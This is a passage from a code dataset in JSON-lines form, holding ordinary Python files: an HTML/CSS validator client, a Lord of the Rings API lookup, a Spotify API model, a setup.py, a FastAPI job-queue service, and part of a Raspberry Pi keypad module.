"pyseg.globals.rot_mat_relion", "line_number": 156, "usage_type": "call"}, {"api_name": "pyseg.globals", "line_number": 156, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 168, "usage_type": "call"}, {"api_name": "scipy.ndimage.morphology.binary_closing", "line_number": 177, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 177, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.uint16", "line_number": 178, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 182, "usage_type": 
"call"}, {"api_name": "os.path", "line_number": 182, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 182, "usage_type": "call"}, {"api_name": "pyseg.disperse_io.save_numpy", "line_number": 185, "usage_type": "call"}, {"api_name": "pyseg.disperse_io", "line_number": 185, "usage_type": "attribute"}, {"api_name": "pyseg.factory.unpickle_obj", "line_number": 188, "usage_type": "call"}, {"api_name": "pyseg.factory", "line_number": 188, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 193, "usage_type": "call"}, {"api_name": "os.path", "line_number": 193, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 193, "usage_type": "call"}, {"api_name": "pyseg.disperse_io.save_vtp", "line_number": 198, "usage_type": "call"}, {"api_name": "pyseg.disperse_io", "line_number": 198, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path", "line_number": 201, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 201, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 206, "usage_type": "call"}]} +{"seq_id": "8147542802", "text": "\"\"\"\n This module handles the\n validation of HTML and\n CSS code of the website's\n user.\n\"\"\"\n\nimport re\nfrom time import sleep\nimport requests\nfrom requests.exceptions import HTTPError\nfrom bs4 import BeautifulSoup\nimport cfscrape\nfrom getch import pause\nfrom modules.validate.validate_input import Validate\nfrom modules.prints import (print_brand_name,\n run_choices_screen, del_last_lines_up)\nfrom modules.regex import VALID_SUBTRING\n\n\ndef run_options():\n \"\"\"\n Function to display options.\n\n ....\n Args:\n None\n ....\n Returns:\n No explicit return set.\n ....\n \"\"\"\n\n del_last_lines_up(1000)\n print_brand_name()\n run_choices_screen()\n\n\ndef choose_another_option_input():\n \"\"\"\n Function to display another\n option input.\n\n ....\n Args:\n None\n ....\n Returns:\n No explicit return set.\n ....\n \"\"\"\n\n while True:\n # Creating a new Validate object\n another = Validate.another_cls()\n # Validating the input against valid items\n response_another = another[0].validate_input(\n another[0], another[1])\n\n if response_another[0] and response_another[1] == 'y':\n break\n\n\ndef error_choose_another_option():\n \"\"\"\n Function to trigger\n choose_another_option_input() &\n run_options() functions\n to user if response from service\n isn't 200, 201 or 202.\n\n ....\n Args:\n None\n ....\n Returns:\n No explicit return set.\n ....\n \"\"\"\n\n choose_another_option_input()\n run_options()\n\n\ndef choose_another_option():\n \"\"\"\n Function to trigger\n choose_another_option_input() &\n run_options() functions to user\n when code has been validated.\n\n ....\n Args:\n None\n ....\n Returns:\n No explicit return set.\n ....\n \"\"\"\n\n del_last_lines_up(1)\n print(\"Well done, there were no errors!\")\n choose_another_option_input()\n run_options()\n\n\ndef try_res(response):\n \"\"\"\n Function to test reponse\n of validator.\n\n ....\n Args:\n self.res_check = requests.get()\n ....\n Returns:\n Set to return either True or\n False depending on the\n response outcome.\n ....\n \"\"\"\n\n try:\n if response not in [200, 201, 202]:\n raise HTTPError(\n f\"Response: {response}\"\n )\n\n except HTTPError as http_err:\n print(\"Validation Service Error: \"\n f\"{http_err}, please try again, later.\")\n return False\n\n except requests.exceptions.ConnectionError:\n 
print(\"This validation service can't be \"\n \"reached, please try again, later.\")\n return False\n\n else:\n return True\n\n\nclass ValidateCode:\n \"\"\"\n Class to validate requested\n codes from either options of\n 1. HTML or 2. CSS\n\n ....\n Args:\n int(option), str(url)\n ....\n Returns:\n Class pass on str(self.data)\n to it's inherited classes\n Html and Css.\n ....\n \"\"\"\n\n def __init__(self, option, url):\n self.option = option\n self.url = url\n\n self.service = ''\n self.res_validator = None\n\n self.html = f\"https://validator.nu/?doc={url}\"\n self.css = f\"https://jigsaw.w3.org/css-validator/validator?uri={url}\"\n\n self.headers = {'Referrer': 'https://webalyzer.heokuapp.com',\n 'User-Agent': 'Mozilla/5.0 (platform; '\n 'rv:geckoversion) Gecko/geckotrail '\n 'Firefox/firefoxversion',\n 'Accept': 'text/html',\n 'Accept-Encoding': 'gzip, compress', }\n\n self.data = None\n\n with requests.Session() as re_s:\n re_s = cfscrape.create_scraper()\n re_s.headers = self.headers\n\n del_last_lines_up(14)\n if self.option == '1':\n print(\"Checking Validator.nu Service!\")\n self.service = \"Validator.nu\"\n self.res_check = requests.get(\n 'https://validator.nu').status_code\n sleep(1.2)\n del_last_lines_up(1)\n\n elif self.option == '2':\n print(\"Checking Jigsaw.w3.org Service!\")\n self.service = \"Jigsaw.w3.org\"\n self.res_check = requests.get(\n 'https://jigsaw.w3.org/css-validator/').status_code\n sleep(1.2)\n del_last_lines_up(1)\n\n self.res_validator = try_res(self.res_check)\n\n def grab_validation(self, request):\n self.data = BeautifulSoup(request.content, 'html5lib')\n self.data.prettify()\n\n return self.data\n\n if not self.res_validator:\n print()\n choose_another_option_input()\n run_options()\n\n elif self.option == '1':\n print(\"Checking Successfull!\")\n sleep(1)\n del_last_lines_up(1)\n print(\"Retriving Results :)\")\n res = re_s.get(self.html)\n grab_validation(self, res)\n sleep(1)\n del_last_lines_up(1)\n else:\n print(\"Checking Successfull!\")\n sleep(1)\n del_last_lines_up(1)\n print(\"Retriving Results :)\")\n res = re_s.get(self.css)\n grab_validation(self, res)\n sleep(1)\n del_last_lines_up(1)\n\n def __str__(self):\n # __str__ avoids sending the\n # object's name and id in memory,\n # instead sends the actual usable data\n return str(self.data)\n\n\nclass Html(ValidateCode):\n \"\"\"\n Class to send validated\n HTML code to err().\n\n ....\n Args:\n str(self.data=(scraped HTML of validated service))\n ....\n Returns:\n Class is not set to explicitly other\n than passed on to err() after a try for error\n has been made.\n ....\n \"\"\"\n\n def __init__(self, option, data):\n super().__init__(option, data)\n\n self.all_lis = None\n self.all_errors = None\n\n if self.data is not None:\n try:\n self.all_lis = self.data.find('ol')\n if self.all_lis == \"'Html' object has no attribute 'data'\":\n raise AttributeError(\n f\"No Response: {self.all_lis}\"\n )\n except AttributeError as data_err:\n del_last_lines_up(3)\n print(\"Ohh.. noo.. 
class Html(ValidateCode):\n    \"\"\"\n    Class to send validated\n    HTML code to err().\n\n    ....\n    Args:\n        str(self.data=(scraped HTML of validated service))\n    ....\n    Returns:\n        Nothing explicitly; the scraped data\n        is passed on to err() after a try for\n        errors has been made.\n    ....\n    \"\"\"\n\n    def __init__(self, option, data):\n        super().__init__(option, data)\n\n        self.all_lis = None\n        self.all_errors = None\n\n        if self.data is not None:\n            try:\n                self.all_lis = self.data.find('ol')\n                if self.all_lis == \"'Html' object has no attribute 'data'\":\n                    raise AttributeError(\n                        f\"No Response: {self.all_lis}\"\n                    )\n            except AttributeError as data_err:\n                del_last_lines_up(3)\n                print(\"Ohh.. noo.. There's an error!\\n\"\n                      \"Error: Did not receive data from validator, \"\n                      \"instead got:\\n\"\n                      f\"{data_err}\"\n                      \"\\n\\nWhich basically means that the \"\n                      \"validator has an issue.\\n\")\n                sleep(3)\n\n        else:\n            print(\"Processing Results..\")\n            sleep(1)\n\n    def err(self):\n        \"\"\"\n        Function to filter\n        errors for the terminal.\n\n        ....\n        Args:\n            str(data=(scraped HTML of validated service))\n        ....\n        Returns:\n            Method prints either the errors or a\n            no-error message in the terminal, then\n            returns True.\n        ....\n        \"\"\"\n\n        if self.all_lis is not None:\n            try:\n                self.all_errors = self.all_lis.find_all('li')\n                if self.all_errors == \"'Html' object has no attribute 'data'\":\n                    raise AttributeError()\n\n            except AttributeError:\n                error_choose_another_option()\n                return True\n\n            else:\n                try:\n                    errors_list = []\n                    for list_item in self.all_errors:\n                        count = 0\n                        for li in list_item.find('li', {'class': 'error'}):\n                            if count == 2:\n                                continue\n                            errors_list.append(li.text)\n                            count += 1\n\n                except TypeError:\n                    choose_another_option()\n\n                else:\n                    print(\"We received the following errors:\\n\")\n\n                    for error in errors_list:\n                        for line in error:\n                            print(\"On line:\", line)\n                            sleep(.4)\n                        print()\n\n                    pause(\n                        message=\"\\x1b[3mPress any key to continue...\\x1b[23m\")\n                    del_last_lines_up(1000)\n                    print_brand_name()\n                    run_choices_screen()\n\n        return True\n\n\nclass Css(ValidateCode):\n    \"\"\"\n    Class to send validated\n    CSS code to err().\n\n    ....\n    Args:\n        str(self.data=(scraped HTML of validated service))\n    ....\n    Returns:\n        The err() method prints either the errors\n        or a no-error message in the terminal,\n        then returns True.\n    ....\n    \"\"\"\n\n    def __init__(self, option, data):\n        super().__init__(option, data)\n\n        self.trs = None\n\n        if self.data is not None:\n            try:\n                self.trs = set(self.data.find_all('tr', {'class': 'error'}))\n                if self.trs == \"'Css' object has no attribute 'data'\":\n                    raise AttributeError(\n                        f\"No Response: {self.trs}\"\n                    )\n\n            except AttributeError as data_err:\n                del_last_lines_up(3)\n                print(\"Ohh.. noo.. 
There's an error!\\n\"\n                      \"Error: Did not receive data from validator, \"\n                      \"instead got:\\n\"\n                      f\"{data_err}\"\n                      \"\\n\\nWhich basically means \"\n                      \"that the validator has an issue.\\n\")\n                sleep(3)\n\n        else:\n            print(\"Processing Results..\")\n            sleep(1)\n\n    def err(self):\n        \"\"\"\n        Function to filter\n        errors for the terminal.\n\n        ....\n        Args:\n            str(data=(scraped CSS of validated service))\n        ....\n        Returns:\n            Method is set to print either the\n            errors or a no-error message in\n            the terminal, and then to return\n            True when finished.\n        ....\n        \"\"\"\n\n        if self.trs is not None:\n            try:\n                if self.trs == (\"'Css' object \"\n                                \"has no attribute 'trs'\"):\n                    raise AttributeError()\n\n            except AttributeError:\n                error_choose_another_option()\n\n            else:\n                error_list = []\n                for tr in self.trs:\n                    tr_text = tr.text\n\n                    valid_text = re.findall(VALID_SUBTRING, tr_text)\n                    for idx in valid_text:\n                        index = valid_text.index(idx)\n                        if not len(idx) > 6:\n                            continue\n                        replace_text = re.sub(' : ', ': ', idx)\n                        valid_text[index] = replace_text\n                        error_list.append(valid_text)\n\n                if len(error_list) != 0:\n                    error_list_wo_dups = set(tuple(err_sub)\n                                             for err_sub in error_list)\n                    del_last_lines_up(5)\n                    print(\"We received the following errors:\\n\")\n\n                    for err_l in error_list_wo_dups:\n                        error_message = re.sub(\n                            r\"(\\s\\s+)\", ' ', ' '.join(err_l))\n\n                        print(\"On line:\", error_message)\n                        print()\n                        sleep(.4)\n\n                    pause(\n                        message=\"\\x1b[3mPress any key to continue...\\x1b[23m\")\n                    del_last_lines_up(1000)\n                    print_brand_name()\n                    run_choices_screen()\n\n                else:\n                    choose_another_option()\n\n        return True\n", "repo_name": "MTraveller/webalyzer", "sub_path": "modules/validate/validate_code.py", "file_name": "validate_code.py", "file_ext": "py", "file_size_in_byte": 12630, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "modules.prints.del_last_lines_up", "line_number": 34, "usage_type": "call"}, {"api_name": "modules.prints.print_brand_name", "line_number": 35, "usage_type": "call"}, {"api_name": "modules.prints.run_choices_screen", "line_number": 36, "usage_type": "call"}, {"api_name": "modules.validate.validate_input.Validate.another_cls", "line_number": 55, "usage_type": "call"}, {"api_name": "modules.validate.validate_input.Validate", "line_number": 55, "usage_type": "name"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 101, "usage_type": "call"}, {"api_name": "requests.exceptions.HTTPError", "line_number": 125, "usage_type": "call"}, {"api_name": "requests.exceptions.HTTPError", "line_number": 129, "usage_type": "name"}, {"api_name": "requests.exceptions", "line_number": 134, "usage_type": "attribute"}, {"api_name": "requests.Session", "line_number": 179, "usage_type": "call"}, {"api_name": "cfscrape.create_scraper", "line_number": 180, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 183, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 187, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 189, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 190, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 195, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 197, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 198, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 203, "usage_type": "call"}, {"api_name": 
"time.sleep", "line_number": 215, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 216, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 220, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 221, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 224, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 225, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 229, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 230, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 269, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 276, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 280, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 328, "usage_type": "call"}, {"api_name": "getch.pause", "line_number": 331, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 333, "usage_type": "call"}, {"api_name": "modules.prints.print_brand_name", "line_number": 334, "usage_type": "call"}, {"api_name": "modules.prints.run_choices_screen", "line_number": 335, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 370, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 377, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 381, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 414, "usage_type": "call"}, {"api_name": "modules.regex.VALID_SUBTRING", "line_number": 414, "usage_type": "argument"}, {"api_name": "re.sub", "line_number": 419, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 426, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 430, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 435, "usage_type": "call"}, {"api_name": "getch.pause", "line_number": 437, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 439, "usage_type": "call"}, {"api_name": "modules.prints.print_brand_name", "line_number": 440, "usage_type": "call"}, {"api_name": "modules.prints.run_choices_screen", "line_number": 441, "usage_type": "call"}]} +{"seq_id": "3409605456", "text": "import requests \n\n\n# get api key from text\ndef get_api_key():\n try:\n with open('api_key.txt', 'r') as file:\n api_key = file.read().strip()\n return api_key\n except FileNotFoundError:\n print(\"Error: 'api_key.txt' not found.\")\n return None\n # api key \nuser_api_key = get_api_key()\n\ndef search_characters_by_race(race):\n api_key = user_api_key\n url = f'https://the-one-api.dev/v2/character?race={race}'\n headers = {'Authorization': f'Bearer {api_key}'}\n\n try:\n response = requests.get(url, headers=headers)\n response_json = response.json()\n\n if response.status_code == 200 and response_json['docs']:\n print(f\"Characters belonging to the race '{race}':\")\n for character in response_json['docs']:\n print(character['name'])\n else:\n print(f\"No characters found belonging to the race '{race}'.\")\n except requests.exceptions.RequestException as e:\n print(f\"Error: {e}\")\n\n# Prompt the user for a race to search for characters\nrace = input(\"Enter the race to search for characters: \")\nsearch_characters_by_race(race)", "repo_name": "onamemba/api_integration", "sub_path": "search_characters_by_race.py", "file_name": "search_characters_by_race.py", "file_ext": "py", 
"file_size_in_byte": 1154, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 31, "usage_type": "attribute"}]} +{"seq_id": "72178090684", "text": "# coding: utf-8\n\n\"\"\"\n Spotify Web API with fixes and improvements from sonallux\n\n You can use Spotify's Web API to discover music and podcasts, manage your Spotify library, control audio playback, and much more. Browse our available Web API endpoints using the sidebar at left, or via the navigation bar on top of this page on smaller screens. In order to make successful Web API requests your app will need a valid access token. One can be obtained through OAuth 2.0. The base URI for all Web API requests is `https://api.spotify.com/v1`. Need help? See our Web API guides for more information, or visit the Spotify for Developers community forum to ask questions and connect with other developers. \n\n The version of the OpenAPI document: 2023.8.30\n Generated by OpenAPI Generator (https://openapi-generator.tech)\n\n Do not edit the class manually.\n\"\"\" # noqa: E501\n\n\nfrom __future__ import annotations\nimport pprint\nimport re # noqa: F401\nimport json\n\n\nfrom typing import Any, Dict, List, Optional\nfrom pydantic import BaseModel, Field, StrictInt, StrictStr, conlist\n\nclass StartAUsersPlaybackRequest(BaseModel):\n \"\"\"\n StartAUsersPlaybackRequest\n \"\"\"\n context_uri: Optional[StrictStr] = Field(None, description=\"Optional. Spotify URI of the context to play. Valid contexts are albums, artists & playlists. `{context_uri:\\\"spotify:album:1Je1IMUlBXcx1Fz0WE7oPT\\\"}` \")\n uris: Optional[conlist(StrictStr)] = Field(None, description=\"Optional. A JSON array of the Spotify track URIs to play. For example: `{\\\"uris\\\": [\\\"spotify:track:4iV5W9uYEdYUVa79Axb7Rh\\\", \\\"spotify:track:1301WleyT98MSxVHPZCA6M\\\"]}` \")\n offset: Optional[Dict[str, Any]] = Field(None, description=\"Optional. Indicates from where in the context playback should start. Only available when context_uri corresponds to an album or playlist object \\\"position\\\" is zero based and can’t be negative. Example: `\\\"offset\\\": {\\\"position\\\": 5}` \\\"uri\\\" is a string representing the uri of the item to start at. Example: `\\\"offset\\\": {\\\"uri\\\": \\\"spotify:track:1301WleyT98MSxVHPZCA6M\\\"}` \")\n position_ms: Optional[StrictInt] = Field(None, description=\"Indicates from what position to start playback. Must be a positive number. Passing in a position that is greater than the length of the track will cause the player to start playing the next song. 
\")\n additional_properties: Dict[str, Any] = {}\n __properties = [\"context_uri\", \"uris\", \"offset\", \"position_ms\"]\n\n class Config:\n \"\"\"Pydantic configuration\"\"\"\n allow_population_by_field_name = True\n validate_assignment = True\n\n def to_str(self) -> str:\n \"\"\"Returns the string representation of the model using alias\"\"\"\n return pprint.pformat(self.dict(by_alias=True))\n\n def to_json(self) -> str:\n \"\"\"Returns the JSON representation of the model using alias\"\"\"\n return json.dumps(self.to_dict())\n\n @classmethod\n def from_json(cls, json_str: str) -> StartAUsersPlaybackRequest:\n \"\"\"Create an instance of StartAUsersPlaybackRequest from a JSON string\"\"\"\n return cls.from_dict(json.loads(json_str))\n\n def to_dict(self):\n \"\"\"Returns the dictionary representation of the model using alias\"\"\"\n _dict = self.dict(by_alias=True,\n exclude={\n \"additional_properties\"\n },\n exclude_none=True)\n # puts key-value pairs in additional_properties in the top level\n if self.additional_properties is not None:\n for _key, _value in self.additional_properties.items():\n _dict[_key] = _value\n\n return _dict\n\n @classmethod\n def from_dict(cls, obj: dict) -> StartAUsersPlaybackRequest:\n \"\"\"Create an instance of StartAUsersPlaybackRequest from a dict\"\"\"\n if obj is None:\n return None\n\n if not isinstance(obj, dict):\n return StartAUsersPlaybackRequest.parse_obj(obj)\n\n _obj = StartAUsersPlaybackRequest.parse_obj({\n \"context_uri\": obj.get(\"context_uri\"),\n \"uris\": obj.get(\"uris\"),\n \"offset\": obj.get(\"offset\"),\n \"position_ms\": obj.get(\"position_ms\")\n })\n # store additional fields in additional_properties\n for _key in obj.keys():\n if _key not in cls.__properties:\n _obj.additional_properties[_key] = obj.get(_key)\n\n return _obj\n\n\n", "repo_name": "Motyak/openapi-WIP", "sub_path": "out_python/openapi_client/models/start_a_users_playback_request.py", "file_name": "start_a_users_playback_request.py", "file_ext": "py", "file_size_in_byte": 4718, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pydantic.BaseModel", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 28, "usage_type": "name"}, {"api_name": "pydantic.StrictStr", "line_number": 28, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 28, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "pydantic.conlist", "line_number": 29, "usage_type": "call"}, {"api_name": "pydantic.StrictStr", "line_number": 29, "usage_type": "argument"}, {"api_name": "pydantic.Field", "line_number": 29, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 30, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 31, "usage_type": "name"}, {"api_name": "pydantic.StrictInt", "line_number": 31, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 31, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 32, "usage_type": "name"}, {"api_name": "pprint.pformat", "line_number": 42, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 46, "usage_type": "call"}, 
{"api_name": "json.loads", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "13682236819", "text": "# setup.py\n\nfrom setuptools import setup\n\n\nPACKAGE = \"pygmnormalize\"\nNAME = \"pygmnormalize\"\nDESCRIPTION = \"Package with methods for normalization matrices of genes expression.\"\nAUTHOR = \"Grigory Feoktistov\"\nAUTHOR_EMAIL = \"ficusss.developer@gmail.com\"\nURL = \"https://github.com/ficusss/PyGMNormalize\"\nVERSION = __import__(PACKAGE).__version__\n\n\nsetup(\n name=NAME,\n version=VERSION,\n description=DESCRIPTION,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n license=\"MIT\",\n url=URL,\n packages=[PACKAGE],\n install_requires=[\n 'numpy',\n 'scipy',\n ],\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n ],\n zip_safe=False,\n)\n", "repo_name": "ficusss/PyGMNormalize", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 864, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "41", "api": [{"api_name": "setuptools.setup", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "26500501078", "text": "import os\nfrom dotenv import load_dotenv\n\nfrom fastapi import FastAPI, Depends, HTTPException\nfrom fastapi.responses import JSONResponse\nfrom pydantic import BaseModel\nfrom sqlalchemy.orm import Session\n\nfrom celery import Celery\n# from celery.execute import send_task (unused import; this module no longer exists in modern Celery)\n\nimport crud\nfrom database import get_session\nimport task_mapper\n\nimport logger\n\nload_dotenv()\n\nPOSTGRES_URL = os.getenv(\"POSTGRES_CONNECTION_URL\")\nBROKER_URL = os.getenv(\"BROKER_URL\")\n\nclass JobRequest(BaseModel):\n payer: str\n transformation: int\n transformation_number: int\n image_url: str\n image_name: str\n block_hash: str\n transaction_hash: str\n\ncelery_app = Celery(\"tasks\", backend=POSTGRES_URL, broker=BROKER_URL)\n\napp = FastAPI()\n\n@app.post(\"/generate\")\nasync def generate(request: JobRequest, session: Session = Depends(get_session)):\n logger.log_job_request(request.payer,\n request.transformation,\n request.transformation_number,\n request.image_name,\n request.image_url)\n\n try:\n task_name = task_mapper.task_name(request.transformation)\n transformation_name = task_mapper.transformation_name(request.transformation)\n except KeyError:\n raise HTTPException(status_code=400, detail=\"Transformation not supported\")\n\n job_request = crud.create_job_request(session, request)\n\n task = celery_app.send_task(task_name,\n [transformation_name,\n request.transformation_number,\n request.payer,\n request.image_url,\n request.image_name])\n logger.log_job_started(task.id)\n\n job_request = crud.add_task_to_job_request(session, job_request, task.id)\n\n return JSONResponse({\"task_id\": task.id})\n", "repo_name": "omniversescience/anaai", "sub_path": "job-service/service.py", "file_name": "service.py", "file_ext": "py", "file_size_in_byte": 1821, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "41", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 18, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 20, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 21, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 23, "usage_type": "name"}, {"api_name": "celery.Celery", "line_number": 32, "usage_type": "call"},
{"api_name": "fastapi.FastAPI", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 37, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 37, "usage_type": "call"}, {"api_name": "database.get_session", "line_number": 37, "usage_type": "argument"}, {"api_name": "logger.log_job_request", "line_number": 38, "usage_type": "call"}, {"api_name": "task_mapper.task_name", "line_number": 45, "usage_type": "call"}, {"api_name": "task_mapper.transformation_name", "line_number": 46, "usage_type": "call"}, {"api_name": "fastapi.HTTPException", "line_number": 48, "usage_type": "call"}, {"api_name": "crud.create_job_request", "line_number": 50, "usage_type": "call"}, {"api_name": "logger.log_job_started", "line_number": 58, "usage_type": "call"}, {"api_name": "crud.add_task_to_job_request", "line_number": 60, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "21275286280", "text": "import RPi.GPIO as GPIO\nfrom adafruit_bus_device import i2c_device\nimport adafruit_aw9523\nfrom PIL import Image, ImageDraw, ImageFont\nimport logging\nimport board\nimport math\nimport time\nimport signal\nimport os\nimport sys\nup_dir = os.path.dirname(os.path.abspath(__file__)) + '/../'\nsys.path.append(up_dir)\n# above line is needed for following classes:\nfrom led_client import LEDClient # noqa E402 need up_dir first\nfrom heartbeat import HeartBeat # noqa E402 need up_dir first\nfrom device import Device # noqa E402 need up_dir first\nfrom diag import WPDiag # noqa E402 need up_dir first\nfrom lcd import LCD as LCD # noqa E402 need up_dir first\nimport constants as consts # noqa E402 need up_dir first\n\ntry:\n from self.configparser import configparser\nexcept ImportError:\n import configparser\ndisplay = True\n\n\nDIR = '/usr/local/pproxy/ui/'\nCONFIG_FILE = '/etc/pproxy/config.ini'\nSTATUS_FILE = '/var/local/pproxy/status.ini'\nLOG_CONFIG = \"/etc/pproxy/logging.ini\"\nlogging.config.fileConfig(LOG_CONFIG,\n disable_existing_loggers=False)\nINT_EXPANDER = 5\nBUTTONS = [\"0\", \"1\", \"2\", \"up\", \"down\", \"back\", \"home\"]\n\n# Unit of time: how often it wakes from sleep\n# in seconds\nUNIT_TIMEOUT = 30\n# Multiply by unit above for all below timeouts\nNRML_SCREEN_TIMEOUT = 40\n# if an error is detected, keep screen\n# on longer\nERR_SCREEN_TIMEOUT = 100\nMENU_TIMEOUT = 10\n\n\nclass KEYPAD:\n\n def __init__(self, menu_items=None):\n self.config = configparser.ConfigParser()\n self.config.read(CONFIG_FILE)\n self.status = configparser.ConfigParser()\n self.status.read(STATUS_FILE)\n self.logger = logging.getLogger(\"keypad\")\n self.device = Device(self.logger)\n self.display_active = False\n self.window_stack = []\n self.led_enabled = True\n self.led_client = LEDClient()\n if (int(self.config.get('hw', 'button-version'))) == 1:\n # this is an old model, no need for the keypad service\n print(\"old keypad\")\n self.enabled = False\n return\n else:\n print(\"new keypad\")\n self.aw = None\n self.init_i2c()\n self.enabled = True\n self.diag_shown = False\n self.lcd = LCD()\n self.lcd.set_lcd_present(self.config.get('hw', 'lcd'))\n self.lcd.display([(1, \"WEPN loading ... 
\", 0, \"white\"), ], 15)\n self.chin = {\"text\": \"\", \"color\": (0, 0, 0), \"opacity\": 100, \"errs\": [False] * 7}\n self.width = 240\n self.height = 240\n self.menu_row_y_size = 37\n self.menu_row_skip = 22\n self.menu = None\n self.menu_index = 0\n self.led_setting_index = 0\n self.current_title = \"Main\"\n self.menu_active_countdown = MENU_TIMEOUT\n self.countdown_to_turn_off_screen = NRML_SCREEN_TIMEOUT\n self.screen_timed_out = False\n self.leds_turned_for_error = False\n self.diag_code = 0\n self.prev_diag_code = 0\n self.err_pending_ack = False\n self.dev_remaining = 7\n self.channel = \"prod\"\n\n def init_i2c(self):\n GPIO.setmode(GPIO.BCM)\n i2c = board.I2C()\n # Set this to the GPIO of the interrupt:\n GPIO.setup(INT_EXPANDER, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n try:\n self.aw = adafruit_aw9523.AW9523(i2c, 0x58)\n new_i2c = i2c_device.I2CDevice(i2c, 0x58)\n except:\n try:\n self.aw = adafruit_aw9523.AW9523(i2c, 0x5b)\n new_i2c = i2c_device.I2CDevice(i2c, 0x5b)\n except:\n self.aw = adafruit_aw9523.AW9523(i2c, 0x5a)\n new_i2c = i2c_device.I2CDevice(i2c, 0x5a)\n self.aw.reset()\n # print(\"Inputs: {:016b}\".format(self.aw.inputs))\n self.aw.directions = 0xff00\n # self.aw.outputs = 0x0000\n time.sleep(1)\n # first write to both registers to reset the interrupt flag\n buffer = bytearray(2)\n buffer[0] = 0x00\n buffer[1] = 0x00\n new_i2c.write(buffer)\n new_i2c.write_then_readinto(buffer, buffer, out_end=1, in_start=1)\n time.sleep(0.1)\n buffer[0] = 0x01\n buffer[1] = 0x00\n new_i2c.write(buffer)\n new_i2c.write_then_readinto(buffer, buffer, out_end=1, in_start=1)\n # disable interrupt for higher bits\n buffer[0] = 0x06\n buffer[1] = 0x00\n new_i2c.write(buffer)\n new_i2c.write_then_readinto(buffer, buffer, out_end=1, in_start=1)\n buffer[0] = 